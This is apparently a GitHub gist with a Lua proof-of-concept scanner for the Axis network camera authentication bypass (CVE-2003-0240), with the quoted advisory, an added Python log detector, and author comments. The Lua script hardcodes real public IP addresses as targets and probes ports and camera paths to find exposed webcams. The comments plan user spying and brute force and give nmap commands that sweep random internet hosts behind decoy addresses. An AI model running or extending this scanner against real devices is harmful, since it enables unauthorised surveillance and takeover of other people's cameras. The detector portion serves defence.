@MrCl0wnLab
Last active August 31, 2019 05:37
POC Request Axis Cam ( CVE: CVE-2003-0240 )
--[[
-- BY MrCl0wnLab & r00t-3xp10it
-- https://gist.github.com/MrCl0wnLab
axis-network-camera-http-authentication-bypass
https://www.coresecurity.com/content/axis-network-camera-http-authentication-bypass
CVE: CVE-2003-0240
Vulnerability Description:
An Axis Network Camera captures and transmits live images directly over an IP network
(e.g. LAN/intranet/Internet), enabling users to remotely view and/or manage the camera
from a Web browser on any computer. For more information see http://www.axis.com
After setting up the Axis Camera, the user is provided with Web-based Administration
Tools for configuring and managing the camera by accessing http://camera-ip/admin/admin.shtml,
which requires a username and password.
We have discovered the following security vulnerability: by accessing
http://camera-ip//admin/admin.shtml (notice the double slash) the authentication
for "admin" is bypassed and an attacker gains direct access to the configuration.
Using this vulnerability, an attacker can reset the root password, then enable
the telnet server by modifying configuration files, giving the attacker interactive
access to a Unix like command line, allowing her to execute arbitrary commands as root.
Vulnerable Packages:
. AXIS 2100 Network Camera versions 2.32 and previous
. AXIS 2110 Network Camera versions 2.32 and previous
. AXIS 2120 Network Camera versions 2.32 and previous
. AXIS 2130 PTZ Network Camera versions 2.32 and previous
. AXIS 2400 Video Server versions 2.32 and previous
. AXIS 2401 Video Server versions 2.32 and previous
. AXIS 2420 Network Camera versions 2.32 and previous
. AXIS 2460 Network DVR versions 3.00 and previous
. AXIS 250S Video Server versions 3.02 and previous
https://www.symantec.com/security_response/attacksignatures/detail.jsp?asid=21492
---------------------------------------------------
Axis Network Camera HTTP Authentication Bypass Vulnerability
Bugtraq ID: | 7652
Class: | Access Validation Error
CVE: | CVE-2003-0240
Remote: | Yes
Local: | No
Published: | May 27 2003 12:00AM
Updated: | Jul 11 2009 10:06PM
TITLE LIST:
Axis 2420 Video Server 2.32
Axis 2420 Network Camera 2.32
Axis 2420 Network Camera 2.31
Axis 2420 Network Camera 2.30
Axis 2401 Video Server 2.32
Axis 2401 Video Server 2.31
Axis 2401 Video Server 2.30
Axis 2400 Video Server 2.32
Axis 2400 Video Server 2.31
Axis 2400 Video Server 2.30
Axis 2130 PTZ Network Camera 2.32
Axis 2130 PTZ Network Camera 2.31
Axis 2130 PTZ Network Camera 2.30
Axis 2120 Network Camera 2.32
Axis 2120 Network Camera 2.31
Axis 2120 Network Camera 2.30
Axis 2110 Network Camera 2.32
Axis 2110 Network Camera 2.31
Axis 2110 Network Camera 2.30
Axis 2100 Network Camera 2.32
Axis 2100 Network Camera 2.31
Axis 2100 Network Camera 2.30
Axis 2100 Network Camera 2.34
URI:
/admin/admin.shtml
https://www.securityfocus.com/bid/7652/info
---------------------------------------------------
]]--
-- DEPENDENCIES (lua libraries) --
local http = require("socket.http")
local string = require("string")
local os = require("os")
local ltn12 = require("ltn12")
local options = {header={}}
local title ,result,uri_list,green_color,by_module,f,uri,check,
yellow_color,white_color,error_color,reset_color,colors,ports,targetPort
uri = "http://216.99.115.136" --> test target 1
uri = "http://185.32.182.75" --> test target 2
uri = "http://www.google.com.br" --> test target 3
options['header']['User-Agent'] = "Mozilla/5.0 (iPhone; CPU iPhone OS 6_1_4 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10B350 Safari/8536.25" --> use iPhone,safari User-agent OR your own...
options['header']['Accept-Language'] = "en-GB,en;q=0.8,sv" --> use en-GB as attacker default install language
options['header']['Cache-Control'] = "no-store" --> Instruct the webserver not to write the response to disk (do not cache it)
ports = { 80, 81, 82, 83, 84, 85, 86, 92, 8080, 8081, 8082, 8083, 8084, 48624, 55752,55754,55756 }
-- SET VALUES COLOR TERMINAL USE IN FUNCTION --
colors = {
-- attributes
reset = 0,
clear = 0,
bright = 1,
dim = 2,
underscore = 4,
blink = 5,
reverse = 7,
hidden = 8,
-- foreground
black = 30,
red = 31,
green = 32,
yellow = 33,
blue = 34,
magenta = 35,
cyan = 36,
white = 37,
-- background
onblack = 40,
onred = 41,
ongreen = 42,
onyellow = 43,
onblue = 44,
onmagenta = 45,
oncyan = 46,
onwhite = 47,
}
-- FUNCTION SET COLOR TERMINAL --
local function makecolor(value)
value = string.char(27) .. '[1;' .. tostring(value) .. 'm'
return value
end
-- SET VALUES COLOR TERMINAL --
green_color = makecolor(colors.green)
white_color = makecolor(colors.white)
error_color = makecolor(colors.red)
reset_color = makecolor(colors.reset)
yellow_color = makecolor(colors.yellow)
-- COLORING MADE BY MODULE --
by_module = white_color.."MrCl0wnLab"..reset_color
uri_list = {
-- URI AXIS
"/indexFrame.shtml",
"/view/viewer_index.shtml",
"/view/index.shtml",
"/view/view.shtml",
"/ViewerFrame.shtml",
"/MultiCameraFrame",
"/view/index2.shtml",
"/RecordFrame?",
"/index.shtml",
"/admin/admin.shtml",
"/indexFrame.shtml",
"/visitor_center/i-cam.html",
"/webcam/view.shtml",
"/webcam_code.php",
"/stadscam/Live95j.asp",
"/sub06/cam.php",
"/CgiStart",
"/cgi-bin/blank.php?strona="
}
-- FUNCTION REQUEST ARRAY URI --
function requestCam(uri,uri_list,header_op)
local t = {}
print(string.format("| %sFiles's:%s",yellow_color,reset_color))
for i, intable in pairs(uri_list) do
local body, statusCode, headers, statusText = http.request{
url=uri..intable, sink = ltn12.sink.table(t)
}
if(statusCode == 200) then
print(string.format("| [%s].....: %s%s", statusCode,uri,intable))
-- RETURN ARRAY VALUES --
return {http_body=table.concat(t),http_code=statusCode,http_header=headers,http_status=statusText,http_uri=uri..intable}
else
print(string.format("| [%s].....: %s%s",statusCode,uri,intable))
t = {}
end
end
print(string.format("|\n|\n| [ABORT]: %sNone Match (uri) has been found in AXISwebcam-recon db.%s\n|\n",error_color,reset_color))
os.execute("sleep 1")
end
-- BANNER --
print("\n\tBY MrCl0wnLab")
print("\thttps://gist.github.com/MrCl0wnLab")
print("\tCheck: Axis Network Camera HTTP Authentication Bypass Vulnerability")
-- EXEC REQUESTS --
print(string.format("\n| %sPort's:%s", yellow_color,reset_color))
for p, port in pairs(ports) do
targetPort = uri..":"..port
print(string.format("| Testing...: %s%s",port,reset_color))
-- TEST PORT REQUESTS --
r,c,h = http.request(targetPort)
if(c == 200) then
print("|_")
-- REQUEST FILES webcam --
result = requestCam(targetPort,uri_list,options)
break
end
end
if(result~=nil) then
-- PRINT HEADER HTTP --
print(string.format("|_\n| %sHeader:%s",yellow_color,reset_color))
for i, intable in pairs(result.http_header) do
print(string.format("| [%s] => %s",i,intable))
end
-- GREP TITLE --
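-- Fall back to an empty string when the page has no <title>, so the checks below never receive nil.
title = string.match(result.http_body, "<[Tt][Ii][Tt][Ll][Ee][^>]*>([^<]*)</[Tt][Ii][Tt][Ll][Ee]>") or ""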
print(string.format("|_\n| %sAXISwebcam-recon:%s",yellow_color,reset_color))
print(string.format("| %sTitle:%s%s",yellow_color,title,reset_color))
-- List {table} of HTTP TITLE tags -
tbl = {"AXIS Video Server",
"Network Camera TUCCAM1",
"Network Camera NetworkCamera",
"Network Camera Hwy285/cr43",
"Network Camera Capitanía",
"Live View / - AXIS",
"Live view / - AXIS 205 version 4.03",
"Live view / - AXIS 205 Network Camera version 4.05",
"Live view / - AXIS 205 Network Camera version 4.05.1",
"Live view / - AXIS 205 Network Camera version 4.04",
"Live view - AXIS P5534-E Network Camera",
"Live view - AXIS 213 PTZ Network Camera version 4.12",
"Live view - AXIS 206M Network Camera version 4.11",
"Live view - AXIS P1354 Network Camera",
"Live view - AXIS P1344 Network Camera",
"Live view - AXIS M1114 Network Camera",
"Live view - AXIS M1103 Network Camera",
"Live view - AXIS M1025 Network Camera",
"Live view - AXIS 240Q Video Server",
"Live view - AXIS 221 Network Camera",
"Live view - AXIS 215 PTZ Network Camera",
"Live view - AXIS 214 PTZ Network Camera",
"Live view - AXIS 213 PTZ Network Camera",
"Live view - AXIS 211 Network Camera",
"Live view - AXIS 211 Network Camera version 4.11",
"Live view - AXIS 211 Network Camera version 4.10",
"AXIS V5914 PTZ Network Camera 5.75.1.11",
"AXIS Q7401 Video Encoder 5.51.5.1",
"AXIS Q6045-E Network Camera",
"AXIS Q6045-E Mk II Network Camera",
"AXIS Q6044-E Network Camera",
"AXIS Q6042-E PTZ Dome Network Camera 5.70.1.4",
"AXIS Q6034-E PTZ Dome Network Camera 5.41.4",
"AXIS Q3505 Fixed Dome Network Camera 6.30.1.1",
"AXIS Q1765-LE Network Camera 5.55.2.3",
"AXIS Q1615 Network Camera",
"AXIS P5635-E Mk II PTZ Dome Network Camera 8.40.2.2",
"AXIS P5635-E Mk II Network Camera",
"AXIS P5534 PTZ Dome Network Camera 5.51.5",
"AXIS P5514 Network Camera",
"AXIS P3354 Fixed Dome Network Camera 5.40.17",
"AXIS P1435-LE Network Camera",
"AXIS P1425-LE Network Camera",
"AXIS P1365 Mk II Network Camera",
"AXIS P1357 Network Camera",
"AXIS P1354 Fixed Network Camera 6.50.3",
"AXIS P1354 Fixed Network Camera 5.60.1",
"AXIS P1353 Network Camera 6.50.2.3",
"AXIS M5013 Network Camera",
"AXIS M3026 Network Camera",
"AXIS M3004 Network Camera 5.51.5.1",
"AXIS M2025-LE Network Camera 8.50.1",
"AXIS M1145-L Network Camera 6.50.3",
"AXIS M1124 Network Camera",
"AXIS F34 Network Camera 6.50.2.3",
"AXIS 243Q(2) Blade 4.45",
"Axis 2420 Video Server 2.32",
"Axis 2420 Network Camera 2.32",
"Axis 2420 Network Camera 2.31",
"Axis 2420 Network Camera 2.30",
"Axis 2401 Video Server 2.32",
"Axis 2401 Video Server 2.31",
"Axis 2401 Video Server 2.30",
"AXIS 2400 Video Server",
"Axis 2400 Video Server 2.32",
"Axis 2400 Video Server 2.31",
"Axis 2400 Video Server 2.30",
"AXIS 214 PTZ Network Camera 4.49",
"Axis 2130 PTZ Network Camera 2.32",
"Axis 2130 PTZ Network Camera 2.31",
"Axis 2130 PTZ Network Camera 2.30",
"Axis 2120 Network Camera 2.34",
"Axis 2120 Network Camera 2.32",
"Axis 2120 Network Camera 2.31",
"Axis 2120 Network Camera 2.30",
"Axis 2110 Network Camera 2.32",
"Axis 2110 Network Camera 2.31",
"Axis 2110 Network Camera 2.30",
"Axis 2100 Network Camera 2.34",
"Axis 2100 Network Camera 2.32",
"Axis 2100 Network Camera 2.31",
"Axis 2100 Network Camera 2.30"}
-- COUNT TOTAL ARRAY TITLE
local count = { i=0 , t=0 }
for i, intable in ipairs(tbl) do
count.t = count.t+1
end
-- TEST TITLE --
for i, intable in ipairs(tbl) do
local validar = string.match(title, intable)
if(title == intable) then
print(string.format("|\n|\n| STATUS...: %sAXIS WEBCAM FOUND%s",green_color,reset_color))
print(string.format("| TITLE...: %s%s%s",green_color,intable,reset_color))
print(string.format("| WEBCAM ACCESS...: %s%s%s",green_color,result.http_uri,reset_color))
print(string.format("| Module Author...: %s\n|\n",by_module))
break --> break out of the loop once a matching string is found.
else
print(string.format("| [%s] TESTING...: %s",count.i,intable))
os.execute("sleep 0.5")
count.i = count.i+1
if (count.i == count.t) then --> why? Because it's the number of TITLE tags present in the {table} list.
return print(string.format("|\n|\n| STATUS...: %sNONE AXIS WEBCAM FOUND%s\n Module Author...: %s\n\n",error_color,reset_color,by_module))
end
end
end
end
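
As an added example (not part of the gist or the quoted advisories), this is one way to spot the double-slash request to `/admin/admin.shtml` described in the advisory text above when reviewing web logs. It assumes a reverse proxy in front of the camera that writes combined-format access logs; the sample lines, addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in combined log format (documentation addresses, not real traffic).
SAMPLE_LOG = """\
192.0.2.10 - - [30/Aug/2019:10:00:01 +0000] "GET /admin/admin.shtml HTTP/1.1" 401 512 "-" "curl/7.58"
192.0.2.10 - - [30/Aug/2019:10:00:02 +0000] "GET //admin/admin.shtml HTTP/1.1" 200 4096 "-" "curl/7.58"
198.51.100.7 - root [30/Aug/2019:10:05:00 +0000] "GET /admin/admin.shtml HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
203.0.113.5 - - [30/Aug/2019:10:06:00 +0000] "GET //admin/admin.shtml HTTP/1.1" 401 512 "-" "x"
203.0.113.5 - - [30/Aug/2019:10:06:01 +0000] "GET /view/index.shtml HTTP/1.1" 200 900 "-" "x"
"""

# Captures: client, authenticated user, method, request target, status
LINE_RE = re.compile(r'^(\S+) \S+ (\S+) \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')
PROTECTED_PREFIX = "/admin/"  # the advisory's login-protected area


def canonical_path(target):
    """Return (decoded, canonical) forms of the request path.

    The query string is cut by hand: urllib.parse.urlsplit() would read the
    leading '//admin' as a network location, and posixpath.normpath() keeps
    a leading double slash, so neither is safe for this comparison.
    """
    decoded = unquote(target.split("?", 1)[0])
    return decoded, re.sub(r"/{2,}", "/", decoded)


def find_bypass_candidates(log_text):
    """Flag requests that reach PROTECTED_PREFIX only after slash collapsing."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format line
        client, user, _method, target, status = m.groups()
        decoded, canon = canonical_path(target)
        if canon.startswith(PROTECTED_PREFIX) and decoded != canon:
            # 2xx with no authenticated user: the protected page was served.
            served = status.startswith("2") and user == "-"
            hits.append((client, target, int(status),
                         "served-unauthenticated" if served else "attempt"))
    return hits


if __name__ == "__main__":
    for hit in find_bypass_candidates(SAMPLE_LOG):
        print(hit)
```

A `served-unauthenticated` hit for a device on the affected firmware list above means the admin page was returned without a login; an `attempt` hit with a 401 is consistent with probing of a device that enforced authentication.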
@r00t-3xp10it

In this example you forgot to 'declare' the uri variable, which will be needed further on in the script.

if (code == 200) then
   uri = intable
end

@MrCl0wnLab
Author

MrCl0wnLab commented Aug 30, 2019

Upcoming functions:

via the /admin/admin.shtml panel

  • Check Version via: file CGI and header['server']
  • Set IP range
  • Save Vulns
  • Set IP range by country
  • Grep Users
  • Add User Spy
  • Grep Time Zone
  • Grep Network - TCP/IP
  • Return Geolocation ip
  • Use API Showda Select=axis
  • Brute Force

@r00t-3xp10it

r00t-3xp10it commented Aug 30, 2019

Cleiton, while trying out nmap's -iR switch I ran into an execution error in our script ..

  • Reproduction:
    • nmap -sS -v -Pn -n -T4 -O -iR 500 -p 92,8080-8082 --open --reason --script=AXISwebcam-recon.nse -oN webcams_reports.txt
    • When our script finds 'authentication logins' it cannot run the 'TITLE' search function against that host
    • But it keeps running the whole function (uri search & title search) against the other targets found (not auth)..
    • Final Notes: if we want to make an nse to brute-force http auth, we just need to look for the [401] error code ;)

SourceCode Update

r00t-3xp10it - AXISwebcam-recon.nse

screenshots

  • Auth login found
  • Running against multiple targets (auth target also in host table)
  • Running the -iR nmap switch == more error codes (sourcecode update)
  • I have also added a new user input option modem=true demonstrating how to capture http modem login pages.

Final Notes:

Version 1.9 is only available in my gist here; I didn't update my official repo with these changes..

  • Try This:: WAN Random Search + Syn Ack + Decoy Ip addr
    sudo nmap -sS -v -Pn -n -T5 -iR 700 -p 8080-8086 --open --script=http-headers.nse,AXISwebcam-recon.nse -D 65.49.82.3 -oN webcam_reports.txt
